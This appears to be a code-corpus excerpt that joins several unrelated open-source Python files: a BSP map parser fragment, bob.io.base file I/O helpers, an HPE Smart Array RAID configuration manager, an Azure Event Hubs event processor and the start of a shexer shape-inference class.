bsp_file.texture_infos[bsp_face.texture_info] miptex = bsp_file.miptextures[texture_info.miptexture_number] s = texture_info.s ds = texture_info.s_offset t = texture_info.t dt = texture_info.t_offset w = miptex.width h = miptex.height uvs = [] for v in vertexes: v = v[:] uv = (dot(v, s) + ds) / w, -(dot(v, t) + dt) / h uvs.append(uv) return uvs @lru_cache(maxsize=None) def get_plane(face_index): bsp_face = bsp_file.faces[face_index] return bsp_file.planes[bsp_face.plane_number] models = get_models() result = Bsp(models) return result class Model(object): __slots__ = ( 'faces' ) def __init__(self, faces): self.faces = faces @property @lru_cache(maxsize=None) def vertexes(self): return list(set([v for f in self.faces for v in f.vertexes])) @property @lru_cache(maxsize=None) def edges(self): return list(set([e for f in self.faces for e in f.edges])) class Face(object): __slots__ = ( 'vertexes', 'edges', 'uvs', 'plane', 'texture_name' ) def __init__(self, vertexes, edges, uvs, plane, texture_name): self.vertexes = vertexes self.edges = edges self.uvs = uvs self.plane = plane self.texture_name = texture_name Edge = namedtuple('Edge', ['vertex_0', 'vertex_1']) class Vertex(object): __slots__ = ( 'x', 'y', 'z' ) def __init__(self, x, y, z): self.x = x self.y = y self.z = z def __getitem__(self, item): return [self.x, self.y, self.z][item]
1.59375
2
bob/io/base/__init__.py
bioidiap/bob.io.base
0
12767915
# import Libraries of other lib packages import numpy import bob.core # import our own Library import bob.extension bob.extension.load_bob_library('bob.io.base', __file__) from ._library import File as _File_C, HDF5File as _HDF5File_C, extensions from . import version from .version import module as __version__ from .version import api as __api_version__ import os class File(_File_C): __doc__ = _File_C.__doc__ def __enter__(self): return self def __exit__(self, type, value, traceback): self.close() class HDF5File(_HDF5File_C): __doc__ = _HDF5File_C.__doc__ def __enter__(self): return self def __exit__(self, type, value, traceback): return self.close() def __contains__(self, x): __doc__ = self.has_key.__doc__ return self.has_key(x) def __iter__(self): __doc__ = self.keys.__doc__ return iter(self.keys()) def __getitem__(self, name): __doc__ = self.get.__doc__ return self.get(name) def __setitem__(self, name, value): __doc__ = self.set.__doc__ return self.set(name, value) def values(self): '''Yields the datasets contained in the current directory. Yields ------- object The datasets that are being read. ''' return (self[key] for key in self) def items(self): '''Yields the keys and the datasets contained in the current directory. Yields ------- tuple The key and the datasets that are being read in a tuple. ''' return ((key, self[key]) for key in self) def _is_string(s): """Returns ``True`` if the given object is a string This method can be used with Python-2.x or 3.x and returns a string respecting each environment's constraints. """ from sys import version_info return (version_info[0] < 3 and isinstance(s, (str, unicode))) or \ isinstance(s, (bytes, str)) @numpy.deprecate(new_name="os.makedirs(directory, exist_ok=True)") def create_directories_safe(directory, dryrun=False): """Creates a directory if it does not exists, with concurrent access support. This function will also create any parent directories that might be required. If the dryrun option is selected, it does not actually create the directory, but just writes the (Linux) command that would have been executed. **Parameters:** ``directory`` : str The directory that you want to create. ``dryrun`` : bool Only ``print`` the command to console, but do not execute it. """ if dryrun: print("[dry-run] mkdir -p '%s'" % directory) else: os.makedirs(directory, exist_ok=True) def load(inputs): """load(inputs) -> data Loads the contents of a file, an iterable of files, or an iterable of :py:class:`bob.io.base.File`'s into a :py:class:`numpy.ndarray`. **Parameters:** ``inputs`` : various types This might represent several different entities: 1. The name of a file (full path) from where to load the data. In this case, this assumes that the file contains an array and returns a loaded numpy ndarray. 2. An iterable of filenames to be loaded in memory. In this case, this would assume that each file contains a single 1D sample or a set of 1D samples, load them in memory and concatenate them into a single and returned 2D :py:class:`numpy.ndarray`. 3. An iterable of :py:class:`File`. In this case, this would assume that each :py:class:`File` contains a single 1D sample or a set of 1D samples, load them in memory if required and concatenate them into a single and returned 2D :py:class:`numpy.ndarray`. 4. An iterable with mixed filenames and :py:class:`File`. In this case, this would returned a 2D :py:class:`numpy.ndarray`, as described by points 2 and 3 above. **Returns:** ``data`` : :py:class:`numpy.ndarray` The data loaded from the given ``inputs``. """ from collections import Iterable import numpy if _is_string(inputs): if not os.path.exists(inputs): raise RuntimeError(f"`{inputs}' does not exist!") return File(inputs, 'r').read() elif isinstance(inputs, Iterable): retval = [] for obj in inputs: if _is_string(obj): retval.append(load(obj)) elif isinstance(obj, File): retval.append(obj.read()) else: raise TypeError( "Iterable contains an object which is not a filename nor a " "bob.io.base.File.") return numpy.vstack(retval) else: raise TypeError( "Unexpected input object. This function is expecting a filename, " "or an iterable of filenames and/or bob.io.base.File's") def merge(filenames): """merge(filenames) -> files Converts an iterable of filenames into an iterable over read-only :py:class:`bob.io.base.File`'s. **Parameters:** ``filenames`` : str or [str] A list of file names. This might represent: 1. A single filename. In this case, an iterable with a single :py:class:`File` is returned. 2. An iterable of filenames to be converted into an iterable of :py:class:`File`'s. **Returns:** ``files`` : [:py:class:`File`] The list of files. """ from collections import Iterable from .utils import is_string if is_string(filenames): return [File(filenames, 'r')] elif isinstance(filenames, Iterable): return [File(k, 'r') for k in filenames] else: raise TypeError( "Unexpected input object. This function is expecting an " "iterable of filenames.") def save(array, filename, create_directories=False): """Saves the contents of an array-like object to file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to ``'w'`` (write with truncation) and calling :py:meth:`File.write` passing ``array`` as parameter. Parameters: ``array`` : array_like The array-like object to be saved on the file ``filename`` : str The name of the file where you need the contents saved to ``create_directories`` : bool Automatically generate the directories if required (defaults to ``False`` because of compatibility reasons; might change in future to default to ``True``) """ # create directory if not existent yet if create_directories: create_directories_safe(os.path.dirname(filename)) # requires data is c-contiguous and aligned, will create a copy otherwise array = numpy.require(array, requirements=('C_CONTIGUOUS', 'ALIGNED')) return File(filename, 'w').write(array) # Just to make it homogenous with the C++ API write = save read = load def append(array, filename): """append(array, filename) -> position Appends the contents of an array-like object to file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to ``'a'`` (append) and calling :py:meth:`File.append` passing ``array`` as parameter. **Parameters:** ``array`` : array_like The array-like object to be saved on the file ``filename`` : str The name of the file where you need the contents saved to **Returns:** ``position`` : int See :py:meth:`File.append` """ # requires data is c-contiguous and aligned, will create a copy otherwise array = numpy.require(array, requirements=('C_CONTIGUOUS', 'ALIGNED')) return File(filename, 'a').append(array) def peek(filename): """peek(filename) -> dtype, shape, stride Returns the type of array (frame or sample) saved in the given file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to `r` (read-only) and calling :py:meth:`File.describe`. **Parameters**: ``filename`` : str The name of the file to peek information from **Returns:** ``dtype, shape, stride`` : see :py:meth:`File.describe` """ return File(filename, 'r').describe() def peek_all(filename): """peek_all(filename) -> dtype, shape, stride Returns the type of array (for full readouts) saved in the given file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to ``'r'`` (read-only) and returning ``File.describe`` with its parameter ``all`` set to ``True``. **Parameters:** ``filename`` : str The name of the file to peek information from **Returns:** ``dtype, shape, stride`` : see :py:meth:`File.describe` """ return File(filename, 'r').describe(all=True) # Keeps compatibility with the previously existing API open = File def get_config(): """Returns a string containing the configuration information. """ return bob.extension.get_config(__name__, version.externals, version.api) def get_include_directories(): """get_include_directories() -> includes Returns a list of include directories for dependent libraries, such as HDF5. This function is automatically used by :py:func:`bob.extension.get_bob_libraries` to retrieve the non-standard include directories that are required to use the C bindings of this library in dependent classes. You shouldn't normally need to call this function by hand. **Returns:** ``includes`` : [str] The list of non-standard include directories required to use the C bindings of this class. For now, only the directory for the HDF5 headers are returned. """ # try to use pkg_config first try: from bob.extension.utils import find_header # locate pkg-config on our own header = 'hdf5.h' candidates = find_header(header) if not candidates: raise RuntimeError( "could not find %s's `%s' - have you installed %s on this " "machine?" % ('hdf5', header, 'hdf5')) return [os.path.dirname(candidates[0])] except RuntimeError: from bob.extension import pkgconfig pkg = pkgconfig('hdf5') return pkg.include_directories() def get_macros(): """get_macros() -> macros Returns a list of preprocessor macros, such as ``(HAVE_HDF5, 1)``. This function is automatically used by :py:func:`bob.extension.get_bob_libraries` to retrieve the prerpocessor definitions that are required to use the C bindings of this library in dependent classes. You shouldn't normally need to call this function by hand. **Returns:** ``macros`` : [(str,str)] The list of preprocessor macros required to use the C bindings of this class. For now, only ``('HAVE_HDF5', '1')`` is returned, when applicable. """ # get include directories if get_include_directories(): return [('HAVE_HDF5', '1')] def _generate_features(reader, paths, same_size=False): """Load and stack features in a memory efficient way. This function is meant to be used inside :py:func:`vstack_features`. Parameters ---------- reader : ``collections.Callable`` See the documentation of :py:func:`vstack_features`. paths : ``collections.Iterable`` See the documentation of :py:func:`vstack_features`. same_size : :obj:`bool`, optional See the documentation of :py:func:`vstack_features`. Yields ------ object The first object returned is a tuple of :py:class:`numpy.dtype` of features and the shape of the first feature. The rest of objects are the actual values in features. The features are returned in C order. """ shape_determined = False for i, path in enumerate(paths): feature = numpy.atleast_2d(reader(path)) feature = numpy.ascontiguousarray(feature) if not shape_determined: shape_determined = True dtype = feature.dtype shape = list(feature.shape) yield (dtype, shape) else: # make sure all features have the same shape and dtype if same_size: assert shape == list(feature.shape) else: assert shape[1:] == list(feature.shape[1:]) assert dtype == feature.dtype if same_size: yield (feature.ravel(),) else: for feat in feature: yield (feat.ravel(),) def vstack_features(reader, paths, same_size=False, dtype=None): """Stacks all features in a memory efficient way. Parameters ---------- reader : ``collections.Callable`` The function to load the features. The function should only take one argument ``path`` and return loaded features. Use :any:`functools.partial` to accommodate your reader to this format. The features returned by ``reader`` are expected to have the same :py:class:`numpy.dtype` and the same shape except for their first dimension. First dimension should correspond to the number of samples. paths : ``collections.Iterable`` An iterable of paths to iterate on. Whatever is inside path is given to ``reader`` so they do not need to be necessarily paths to actual files. If ``same_size`` is ``True``, ``len(paths)`` must be valid. same_size : :obj:`bool`, optional If ``True``, it assumes that arrays inside all the paths are the same shape. If you know the features are the same size in all paths, set this to ``True`` to improve the performance. dtype : :py:class:`numpy.dtype`, optional If provided, the data will be casted to this format. Returns ------- numpy.ndarray The read features with the shape ``(n_samples, *features_shape[1:])``. Examples -------- This function in a simple way is equivalent to calling ``numpy.vstack([reader(p) for p in paths])``. >>> import numpy >>> from bob.io.base import vstack_features >>> def reader(path): ... # in each file, there are 5 samples and features are 2 dimensional. ... return numpy.arange(10).reshape(5,2) >>> paths = ['path1', 'path2'] >>> all_features = vstack_features(reader, paths) >>> numpy.allclose(all_features, numpy.array( ... [[0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9], ... [0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9]])) True >>> all_features_with_more_memory = numpy.vstack([reader(p) for p in paths]) >>> numpy.allclose(all_features, all_features_with_more_memory) True You can allocate the array at once to improve the performance if you know that all features in paths have the same shape and you know the total number of the paths: >>> all_features = vstack_features(reader, paths, same_size=True) >>> numpy.allclose(all_features, numpy.array( ... [[0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9], ... [0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9]])) True """ iterable = _generate_features(reader, paths, same_size) data_dtype, shape = next(iterable) if dtype is None: dtype = data_dtype if same_size: # numpy black magic: https://stackoverflow.com/a/12473478/1286165 field_dtype = [("", (dtype, (numpy.prod(shape),)))] total_size = len(paths) all_features = numpy.fromiter(iterable, field_dtype, total_size) else: field_dtype = [("", (dtype, (numpy.prod(shape[1:]),)))] all_features = numpy.fromiter(iterable, field_dtype) # go from a field array to a normal array all_features = all_features.view(dtype) # the shape is assumed to be (n_samples, ...) it can be (5, 2) or (5, 3, 4). shape = list(shape) shape[0] = -1 return numpy.reshape(all_features, shape, order="C") # gets sphinx autodoc done right - don't remove it __all__ = [_ for _ in dir() if not _.startswith('_')]
1.898438
2
proliantutils/hpssa/manager.py
anta-nok/proliantutils
0
12768043
<filename>proliantutils/hpssa/manager.py # Copyright 2015 Hewlett-Packard Development Company, L.P. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import json import os import time import jsonschema from jsonschema import exceptions as json_schema_exc from proliantutils import exception from proliantutils.hpssa import constants from proliantutils.hpssa import disk_allocator from proliantutils.hpssa import objects CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) RAID_CONFIG_SCHEMA = os.path.join(CURRENT_DIR, "raid_config_schema.json") def _update_physical_disk_details(raid_config, server): """Adds the physical disk details to the RAID configuration passed.""" raid_config['physical_disks'] = [] physical_drives = server.get_physical_drives() for physical_drive in physical_drives: physical_drive_dict = physical_drive.get_physical_drive_dict() raid_config['physical_disks'].append(physical_drive_dict) def validate(raid_config): """Validates the RAID configuration provided. This method validates the RAID configuration provided against a JSON schema. :param raid_config: The RAID configuration to be validated. :raises: InvalidInputError, if validation of the input fails. """ raid_schema_fobj = open(RAID_CONFIG_SCHEMA, 'r') raid_config_schema = json.load(raid_schema_fobj) try: jsonschema.validate(raid_config, raid_config_schema) except json_schema_exc.ValidationError as e: raise exception.InvalidInputError(e.message) for logical_disk in raid_config['logical_disks']: # If user has provided 'number_of_physical_disks' or # 'physical_disks', validate that they have mentioned at least # minimum number of physical disks required for that RAID level. raid_level = logical_disk['raid_level'] min_disks_reqd = constants.RAID_LEVEL_MIN_DISKS[raid_level] no_of_disks_specified = None if 'number_of_physical_disks' in logical_disk: no_of_disks_specified = logical_disk['number_of_physical_disks'] elif 'physical_disks' in logical_disk: no_of_disks_specified = len(logical_disk['physical_disks']) if (no_of_disks_specified and no_of_disks_specified < min_disks_reqd): msg = ("RAID level %(raid_level)s requires at least %(number)s " "disks." % {'raid_level': raid_level, 'number': min_disks_reqd}) raise exception.InvalidInputError(msg) def _select_controllers_by(server, select_condition, msg): """Filters out the hpssa controllers based on the condition. This method updates the server with only the controller which satisfies the condition. The controllers which doesn't satisfies the selection condition will be removed from the list. :param server: The object containing all the supported hpssa controllers details. :param select_condition: A lambda function to select the controllers based on requirement. :param msg: A String which describes the controller selection. :raises exception.HPSSAOperationError, if all the controller are in HBA mode. """ all_controllers = server.controllers supported_controllers = [c for c in all_controllers if select_condition(c)] if not supported_controllers: reason = ("None of the available SSA controllers %(controllers)s " "have %(msg)s" % {'controllers': ', '.join([c.id for c in all_controllers]), 'msg': msg}) raise exception.HPSSAOperationError(reason=reason) server.controllers = supported_controllers def create_configuration(raid_config): """Create a RAID configuration on this server. This method creates the given RAID configuration on the server based on the input passed. :param raid_config: The dictionary containing the requested RAID configuration. This data structure should be as follows: raid_config = {'logical_disks': [{'raid_level': 1, 'size_gb': 100}, <info-for-logical-disk-2> ]} :returns: the current raid configuration. This is same as raid_config with some extra properties like root_device_hint, volume_name, controller, physical_disks, etc filled for each logical disk after its creation. :raises exception.InvalidInputError, if input is invalid. :raises exception.HPSSAOperationError, if all the controllers are in HBA mode. """ server = objects.Server() select_controllers = lambda x: not x.properties.get('HBA Mode Enabled', False) _select_controllers_by(server, select_controllers, 'RAID enabled') validate(raid_config) # Make sure we create the large disks first. This is avoid the # situation that we avoid giving large disks to smaller requests. # For example, consider this: # - two logical disks - LD1(50), LD(100) # - have 4 physical disks - PD1(50), PD2(50), PD3(100), PD4(100) # # In this case, for RAID1 configuration, if we were to consider # LD1 first and allocate PD3 and PD4 for it, then allocation would # fail. So follow a particular order for allocation. # # Also make sure we create the MAX logical_disks the last to make sure # we allot only the remaining space available. logical_disks_sorted = ( sorted((x for x in raid_config['logical_disks'] if x['size_gb'] != "MAX"), reverse=True, key=lambda x: x['size_gb']) + [x for x in raid_config['logical_disks'] if x['size_gb'] == "MAX"]) if any(logical_disk['share_physical_disks'] for logical_disk in logical_disks_sorted if 'share_physical_disks' in logical_disk): logical_disks_sorted = _sort_shared_logical_disks(logical_disks_sorted) # We figure out the new disk created by recording the wwns # before and after the create, and then figuring out the # newly found wwn from it. wwns_before_create = set([x.wwn for x in server.get_logical_drives()]) for logical_disk in logical_disks_sorted: if 'physical_disks' not in logical_disk: disk_allocator.allocate_disks(logical_disk, server, raid_config) controller_id = logical_disk['controller'] controller = server.get_controller_by_id(controller_id) if not controller: msg = ("Unable to find controller named '%(controller)s'." " The available controllers are '%(ctrl_list)s'." % {'controller': controller_id, 'ctrl_list': ', '.join( [c.id for c in server.controllers])}) raise exception.InvalidInputError(reason=msg) if 'physical_disks' in logical_disk: for physical_disk in logical_disk['physical_disks']: disk_obj = controller.get_physical_drive_by_id(physical_disk) if not disk_obj: msg = ("Unable to find physical disk '%(physical_disk)s' " "on '%(controller)s'" % {'physical_disk': physical_disk, 'controller': controller_id}) raise exception.InvalidInputError(msg) controller.create_logical_drive(logical_disk) # Now find the new logical drive created. server.refresh() wwns_after_create = set([x.wwn for x in server.get_logical_drives()]) new_wwn = wwns_after_create - wwns_before_create if not new_wwn: reason = ("Newly created logical disk with raid_level " "'%(raid_level)s' and size %(size_gb)s GB not " "found." % {'raid_level': logical_disk['raid_level'], 'size_gb': logical_disk['size_gb']}) raise exception.HPSSAOperationError(reason=reason) new_logical_disk = server.get_logical_drive_by_wwn(new_wwn.pop()) new_log_drive_properties = new_logical_disk.get_logical_drive_dict() logical_disk.update(new_log_drive_properties) wwns_before_create = wwns_after_create.copy() _update_physical_disk_details(raid_config, server) return raid_config def _sort_shared_logical_disks(logical_disks): """Sort the logical disks based on the following conditions. When the share_physical_disks is True make sure we create the volume which needs more disks first. This avoids the situation of insufficient disks for some logical volume request. For example, - two logical disk with number of disks - LD1(3), LD2(4) - have 4 physical disks In this case, if we consider LD1 first then LD2 will fail since not enough disks available to create LD2. So follow a order for allocation when share_physical_disks is True. Also RAID1 can share only when there is logical volume with only 2 disks. So make sure we create RAID 1 first when share_physical_disks is True. And RAID 1+0 can share only when the logical volume with even number of disks. :param logical_disks: 'logical_disks' to be sorted for shared logical disks. :returns: the logical disks sorted based the above conditions. """ is_shared = (lambda x: True if ('share_physical_disks' in x and x['share_physical_disks']) else False) num_of_disks = (lambda x: x['number_of_physical_disks'] if 'number_of_physical_disks' in x else constants.RAID_LEVEL_MIN_DISKS[x['raid_level']]) # Separate logical disks based on share_physical_disks value. # 'logical_disks_shared' when share_physical_disks is True and # 'logical_disks_nonshared' when share_physical_disks is False logical_disks_shared = [] logical_disks_nonshared = [] for x in logical_disks: target = (logical_disks_shared if is_shared(x) else logical_disks_nonshared) target.append(x) # Separete logical disks with raid 1 from the 'logical_disks_shared' into # 'logical_disks_shared_raid1' and remaining as # 'logical_disks_shared_excl_raid1'. logical_disks_shared_raid1 = [] logical_disks_shared_excl_raid1 = [] for x in logical_disks_shared: target = (logical_disks_shared_raid1 if x['raid_level'] == '1' else logical_disks_shared_excl_raid1) target.append(x) # Sort the 'logical_disks_shared' in reverse order based on # 'number_of_physical_disks' attribute, if provided, otherwise minimum # disks required to create the logical volume. logical_disks_shared = sorted(logical_disks_shared_excl_raid1, reverse=True, key=num_of_disks) # Move RAID 1+0 to first in 'logical_disks_shared' when number of physical # disks needed to create logical volume cannot be shared with odd number of # disks and disks higher than that of RAID 1+0. check = True for x in logical_disks_shared: if x['raid_level'] == "1+0": x_num = num_of_disks(x) for y in logical_disks_shared: if y['raid_level'] != "1+0": y_num = num_of_disks(y) if x_num < y_num: check = (True if y_num % 2 == 0 else False) if check: break if not check: logical_disks_shared.remove(x) logical_disks_shared.insert(0, x) check = True # Final 'logical_disks_sorted' list should have non shared logical disks # first, followed by shared logical disks with RAID 1, and finally by the # shared logical disks sorted based on number of disks and RAID 1+0 # condition. logical_disks_sorted = (logical_disks_nonshared + logical_disks_shared_raid1 + logical_disks_shared) return logical_disks_sorted def delete_configuration(): """Delete a RAID configuration on this server. :returns: the current RAID configuration after deleting all the logical disks. """ server = objects.Server() select_controllers = lambda x: not x.properties.get('HBA Mode Enabled', False) _select_controllers_by(server, select_controllers, 'RAID enabled') for controller in server.controllers: # Trigger delete only if there is some RAID array, otherwise # hpssacli/ssacli will fail saying "no logical drives found.". if controller.raid_arrays: controller.delete_all_logical_drives() return get_configuration() def get_configuration(): """Get the current RAID configuration. Get the RAID configuration from the server and return it as a dictionary. :returns: A dictionary of the below format. raid_config = { 'logical_disks': [{ 'size_gb': 100, 'raid_level': 1, 'physical_disks': [ '5I:0:1', '5I:0:2'], 'controller': 'Smart array controller' }, ] } """ server = objects.Server() logical_drives = server.get_logical_drives() raid_config = {} raid_config['logical_disks'] = [] for logical_drive in logical_drives: logical_drive_dict = logical_drive.get_logical_drive_dict() raid_config['logical_disks'].append(logical_drive_dict) _update_physical_disk_details(raid_config, server) return raid_config def has_erase_completed(): server = objects.Server() drives = server.get_physical_drives() if any((drive.erase_status == 'Erase In Progress') for drive in drives): return False else: return True def erase_devices(): """Erase all the drives on this server. This method performs sanitize erase on all the supported physical drives in this server. This erase cannot be performed on logical drives. :returns: a dictionary of controllers with drives and the erase status. :raises exception.HPSSAException, if none of the drives support sanitize erase. """ server = objects.Server() for controller in server.controllers: drives = [x for x in controller.unassigned_physical_drives if (x.get_physical_drive_dict().get('erase_status', '') == 'OK')] if drives: controller.erase_devices(drives) while not has_erase_completed(): time.sleep(300) server.refresh() status = {} for controller in server.controllers: drive_status = {x.id: x.erase_status for x in controller.unassigned_physical_drives} sanitize_supported = controller.properties.get( 'Sanitize Erase Supported', 'False') if sanitize_supported == 'False': msg = ("Drives overwritten with zeros because sanitize erase " "is not supported on the controller.") else: msg = ("Sanitize Erase performed on the disks attached to " "the controller.") drive_status.update({'Summary': msg}) status[controller.id] = drive_status return status
1.445313
1
sdk/eventhub/azure-eventhubs/azure/eventhub/_eventprocessor/event_processor.py
mjudeikis/azure-sdk-for-python
0
12768171
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- import uuid import logging import time import threading from functools import partial from .partition_context import PartitionContext from .ownership_manager import OwnershipManager from .common import CloseReason from. _eventprocessor_mixin import EventProcessorMixin _LOGGER = logging.getLogger(__name__) class EventProcessor(EventProcessorMixin): # pylint:disable=too-many-instance-attributes """ An EventProcessor constantly receives events from one or multiple partitions of the Event Hub in the context of a given consumer group. """ def __init__(self, eventhub_client, consumer_group, on_event, **kwargs): self._consumer_group = consumer_group self._eventhub_client = eventhub_client self._namespace = eventhub_client._address.hostname # pylint: disable=protected-access self._eventhub_name = eventhub_client.eventhub_name self._event_handler = on_event self._partition_id = kwargs.get("partition_id", None) self._error_handler = kwargs.get("on_error", None) self._partition_initialize_handler = kwargs.get("on_partition_initialize", None) self._partition_close_handler = kwargs.get("on_partition_close", None) self._checkpoint_store = kwargs.get("checkpoint_store", None) self._initial_event_position = kwargs.get("initial_event_position", "-1") self._initial_event_position_inclusive = kwargs.get("initial_event_position_inclusive", False) self._load_balancing_interval = kwargs.get("load_balancing_interval", 10.0) self._ownership_timeout = self._load_balancing_interval * 2 self._partition_contexts = {} # Receive parameters self._owner_level = kwargs.get("owner_level", None) if self._checkpoint_store and self._owner_level is None: self._owner_level = 0 self._prefetch = kwargs.get("prefetch", None) self._track_last_enqueued_event_properties = kwargs.get("track_last_enqueued_event_properties", False) self._id = str(uuid.uuid4()) self._running = False self._lock = threading.RLock() self._consumers = {} self._ownership_manager = OwnershipManager( self._eventhub_client, self._consumer_group, self._id, self._checkpoint_store, self._ownership_timeout, self._partition_id ) def __repr__(self): return 'EventProcessor: id {}'.format(self._id) def _cancel_tasks_for_partitions(self, to_cancel_partitions): with self._lock: for partition_id in to_cancel_partitions: if partition_id in self._consumers: self._consumers[partition_id].stop = True if to_cancel_partitions: _LOGGER.info("EventProcesor %r has cancelled partitions %r", self._id, to_cancel_partitions) def _create_tasks_for_claimed_ownership(self, claimed_partitions, checkpoints=None): with self._lock: for partition_id in claimed_partitions: if partition_id not in self._consumers: if partition_id in self._partition_contexts: partition_context = self._partition_contexts[partition_id] else: partition_context = PartitionContext( self._namespace, self._eventhub_name, self._consumer_group, partition_id, self._checkpoint_store ) self._partition_contexts[partition_id] = partition_context checkpoint = checkpoints.get(partition_id) if checkpoints else None initial_event_position, event_postition_inclusive =\ self.get_init_event_position(partition_id, checkpoint) event_received_callback = partial(self._on_event_received, partition_context) self._consumers[partition_id] = self.create_consumer(partition_id, initial_event_position, event_postition_inclusive, event_received_callback) if self._partition_initialize_handler: self._handle_callback( [self._partition_initialize_handler, self._partition_contexts[partition_id]] ) def _handle_callback(self, callback_and_args): callback = callback_and_args[0] try: callback(*callback_and_args[1:]) except Exception as exp: # pylint:disable=broad-except partition_context = callback_and_args[1] if self._error_handler and callback != self._error_handler: self._handle_callback([self._error_handler, partition_context, exp]) else: _LOGGER.warning( "EventProcessor instance %r of eventhub %r partition %r consumer group %r" " has another error during running process_error(). The exception is %r.", self._id, partition_context.eventhub_name, partition_context.partition_id, partition_context.consumer_group, exp ) def _on_event_received(self, partition_context, event): with self._context(event): if self._track_last_enqueued_event_properties: partition_context._last_received_event = event # pylint: disable=protected-access self._handle_callback([self._event_handler, partition_context, event]) def _load_balancing(self): """Start the EventProcessor. The EventProcessor will try to claim and balance partition ownership with other `EventProcessor` and start receiving EventData from EventHub and processing events. :return: None """ while self._running: try: checkpoints = self._ownership_manager.get_checkpoints() if self._checkpoint_store else None claimed_partition_ids = self._ownership_manager.claim_ownership() if claimed_partition_ids: to_cancel_list = set(self._consumers.keys()) - set(claimed_partition_ids) self._create_tasks_for_claimed_ownership(claimed_partition_ids, checkpoints) else: _LOGGER.info("EventProcessor %r hasn't claimed an ownership. It keeps claiming.", self._id) to_cancel_list = set(self._consumers.keys()) if to_cancel_list: self._cancel_tasks_for_partitions(to_cancel_list) except Exception as err: # pylint:disable=broad-except _LOGGER.warning("An exception (%r) occurred during balancing and claiming ownership for " "eventhub %r consumer group %r. Retrying after %r seconds", err, self._eventhub_name, self._consumer_group, self._load_balancing_interval) # ownership_manager.get_checkpoints() and ownership_manager.claim_ownership() may raise exceptions # when there are load balancing and/or checkpointing (checkpoint_store isn't None). # They're swallowed here to retry every self._load_balancing_interval seconds. # Meanwhile this event processor won't lose the partitions it has claimed before. # If it keeps failing, other EventProcessors will start to claim ownership of the partitions # that this EventProcessor is working on. So two or multiple EventProcessors may be working # on the same partition. time.sleep(self._load_balancing_interval) def _close_consumer(self, partition_id, consumer, reason): consumer.close() with self._lock: del self._consumers[partition_id] _LOGGER.info( "PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r" " is being closed. Reason is: %r", self._id, self._partition_contexts[partition_id].eventhub_name, self._partition_contexts[partition_id].partition_id, self._partition_contexts[partition_id].consumer_group, reason ) if self._partition_close_handler: self._handle_callback([self._partition_close_handler, self._partition_contexts[partition_id], reason]) self._ownership_manager.release_ownership(partition_id) def start(self): if self._running: _LOGGER.info("EventProcessor %r has already started.", self._id) return _LOGGER.info("EventProcessor %r is being started", self._id) self._running = True thread = threading.Thread(target=self._load_balancing) thread.daemon = True thread.start() while self._running: for partition_id, consumer in list(self._consumers.items()): if consumer.stop: self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST) continue try: consumer.receive() except Exception as error: # pylint:disable=broad-except _LOGGER.warning( "PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r" " has met an error. The exception is %r.", self._id, self._partition_contexts[partition_id].eventhub_name, self._partition_contexts[partition_id].partition_id, self._partition_contexts[partition_id].consumer_group, error ) if self._error_handler: self._handle_callback([self._error_handler, self._partition_contexts[partition_id], error]) self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST) with self._lock: for partition_id, consumer in list(self._consumers.items()): self._close_consumer(partition_id, consumer, CloseReason.SHUTDOWN) def stop(self): """Stop the EventProcessor. The EventProcessor will stop receiving events from EventHubs and release the ownership of the partitions it is working on. Other running EventProcessor will take over these released partitions. A stopped EventProcessor can be restarted by calling method `start` again. :return: None """ if not self._running: _LOGGER.info("EventProcessor %r has already been stopped.", self._id) return self._running = False _LOGGER.info("EventProcessor %r has been stopped.", self._id)
1.53125
2
shexer/core/shexing/strategy/direct_and_inverse_shexing_strategy.py
DaniFdezAlvarez/dbpedia-shexer
0
12768299
<filename>shexer/core/shexing/strategy/direct_and_inverse_shexing_strategy.py from shexer.core.shexing.strategy.asbtract_shexing_strategy import AbstractShexingStrategy from shexer.utils.shapes import build_shapes_name_for_class_uri from shexer.model.statement import Statement from shexer.model.shape import Shape _POS_FEATURES_DIRECT = 0 _POS_FEATURES_INVERSE = 1 class DirectAndInverseShexingStrategy(AbstractShexingStrategy): def __init__(self, class_shexer): super().__init__(class_shexer) self._class_profile_dict = self._class_shexer._class_profile_dict self._shapes_namespace = self._class_shexer._shapes_namespace self._class_counts_dict = self._class_shexer._class_counts_dict def remove_statements_to_gone_shapes(self, shape, shape_names_to_remove): shape.direct_statements = self._statements_without_shapes_to_remove( original_statements=shape.direct_statements, shape_names_to_remove=shape_names_to_remove) shape.inverse_statements = self._statements_without_shapes_to_remove( original_statements=shape.inverse_statements, shape_names_to_remove=shape_names_to_remove) def yield_base_shapes(self, acceptance_threshold): for a_class_key in self._class_profile_dict: name = build_shapes_name_for_class_uri(class_uri=a_class_key, shapes_namespace=self._shapes_namespace) number_of_instances = float(self._class_counts_dict[a_class_key]) direct_statements = self._build_base_direct_statements(acceptance_threshold, a_class_key, number_of_instances) inverse_statements = self._build_base_inverse_statements(acceptance_threshold=acceptance_threshold, class_key=a_class_key, number_of_instances=number_of_instances) yield Shape(name=name, class_uri=a_class_key, statements=direct_statements + inverse_statements) def set_valid_shape_constraints(self, shape): valid_statements = self._select_valid_statements_of_shape(shape.direct_statements) valid_statements += self._select_valid_statements_of_shape(shape.inverse_statements) self._tune_list_of_valid_statements(valid_statements=valid_statements) shape.statements = valid_statements def _build_base_inverse_statements(self, acceptance_threshold, class_key, 